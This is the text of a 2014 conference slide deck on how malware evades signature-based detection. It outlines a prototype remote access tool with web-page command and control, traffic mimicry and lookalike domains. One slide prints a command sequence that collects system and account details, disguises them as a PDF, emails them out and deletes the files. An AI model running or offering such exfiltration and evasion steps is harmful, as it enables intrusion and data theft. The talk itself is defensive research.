Hiding in plain sight

38
Hiding in Plain Sight Rob Gillen @argodev This work is licensed under a Creative Commons Attribution 3.0 License .

description

This talk focuses on various ways to attempt to be as much like normal users/behavior/traffic as possible. We also demonstrate the limitations of signature-based detection systems and then discuss a prototype Remote Access Tool (RAT) that is designed to blend in with normal activity. Presented at CodeMash, January 8, 2014

Transcript of Hiding in plain sight

Page 1: Hiding in plain sight

Hiding in Plain Sight

Rob Gillen@argodev

This work is licensed under a Creative Commons Attribution 3.0 License.

Page 2: Hiding in plain sight

Disclaimer

The content of this presentation represents my personal views and thoughts at the present time. This content is not endorsed by, or representative in any way of my employer nor is it intended to be a view into my work or a reflection on the type of work that I or my group performs. It is simply a hobby and personal interest and should be considered as such.

Page 3: Hiding in plain sight
Page 4: Hiding in plain sight

HTDCS

Helpdesk Ticket Driven Cyber Security

Page 5: Hiding in plain sight
Page 6: Hiding in plain sight
Page 7: Hiding in plain sight

CHALLENGES OF SIGNATURE TOOLSDemonstration

Page 8: Hiding in plain sight

Network Overview

Page 9: Hiding in plain sight

Attack Pattern

Page 10: Hiding in plain sight

Attack Pattern

Page 11: Hiding in plain sight

Attack Pattern

Page 12: Hiding in plain sight

Attack Pattern

Page 13: Hiding in plain sight

Client Compromise (Simple)

Page 14: Hiding in plain sight

Client Compromise (Encoded & SSL)

Page 15: Hiding in plain sight

Overview

• RAT Design• Encryption• Command/Control (C2)• AntiVirus• Behavior

Page 16: Hiding in plain sight

RAT Design

• Exe is dropped via infected page

• Queries web page for commands• Performs commands if not done previously

• Periodically polls for new commands

Page 17: Hiding in plain sight

Encryption

• Complex Encryption is trivial• PBKDF – Scrypt sequential memory-hard function

• Many iterations (> 10K)• Long key-lengths

Page 18: Hiding in plain sight

Encryption Example

• Above configuration is custom-hardware resistant– Takes approximately ¼ second per guess

Page 19: Hiding in plain sight

Command/Control

• Use Web2C Approach– Commands are “issued” en masse via normal, benign looking web pages

– Common ports– Leverages existing HTML/server constructs

Page 20: Hiding in plain sight
Page 21: Hiding in plain sight
Page 22: Hiding in plain sight
Page 23: Hiding in plain sight

Command Text

ipconfig /all > %APPDATA%\info.txtnet start >> %APPDATA%\info.txttasklist /v >> %APPDATA%\info.txtnet user >> %APPDATA%\info.txtnet localgroup administrators >> %APPDATA%\info.txtnetstat -ano >> %APPDATA%\info.txtnet use >> %APPDATA%\info.txtcopy %APPDATA%\info.txt %APPDATA%\output.pdfdel %APPDATA%\info.txt

sendmail %APPDATA%\output.pdf Status Update “Jones, William E. [email protected][email protected] smtp.yourorg.gov

del %APPDATA%\output.pdf

Page 24: Hiding in plain sight

Mimic User Behavior

• Traffic Rates– Monitor incoming/outgoing network traffic for X days

– Configure xfil to stay within X% of “normal”

• C2– Exponential/randomized stand-down– Only comm during periods of activity

Page 25: Hiding in plain sight
Page 26: Hiding in plain sight
Page 27: Hiding in plain sight

Mimic User Behavior

• Target URLs– Monitor outgoing web queries/URLs for X days

– Use similar domain names for malicious traffic

– Append similar/same query strings to malicious requests

Page 28: Hiding in plain sight

Hiding in Logs

v-client-5b.sjc.dropbox.comsnt-re3-9a.sjc.dropbox.comyn-in-f125.1e100.netl1.ycs.vip.dcb.yahoo.comsnt-re3-9a.sjc.drpbox.comip-69-31-29-228.nlayer.neta23-47-20-211.deploy.static.akamaitechnologies.coml3.ycs.vip.dcb.yahoo.comir2.fp.vip.bf1.yahoo.comwww.nbcnews.com.edgesuite.netwac.946A.edgecastcdn.neta2.twimg.com

Page 29: Hiding in plain sight

Other Hiding Techniques

• Office File content embedding• Creative location

Page 30: Hiding in plain sight
Page 31: Hiding in plain sight
Page 32: Hiding in plain sight
Page 33: Hiding in plain sight
Page 34: Hiding in plain sight
Page 35: Hiding in plain sight
Page 36: Hiding in plain sight
Page 37: Hiding in plain sight

Next Steps

• Know what you can and can’t see• Consider implications of your monitoring strategy

• Behavior *must* play a role

Page 38: Hiding in plain sight

Questions/Contact

Rob [email protected]://rob.gillenfamily.net @argodev